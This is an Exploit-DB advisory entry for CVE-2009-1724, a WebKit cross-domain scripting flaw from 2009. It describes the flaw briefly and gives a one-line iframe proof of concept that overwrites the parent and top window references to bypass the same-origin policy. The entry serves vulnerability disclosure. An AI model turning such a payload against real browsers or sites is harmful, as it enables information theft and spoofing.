WebKit 'parent/top' Cross Domain Scripting Vulnerability

2009-05-19T00:00:00
ID EDB-ID:33047
Type exploitdb
Reporter Gareth Hayes
Modified 2009-05-19T00:00:00

Description

WebKit 'parent/top' Cross Domain Scripting Vulnerability. CVE-2009-1724. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/35441/info

WebKit is prone to a cross-domain scripting vulnerability.

A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or launch spoofing attacks against other sites. Other attacks are also possible. 

<iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe>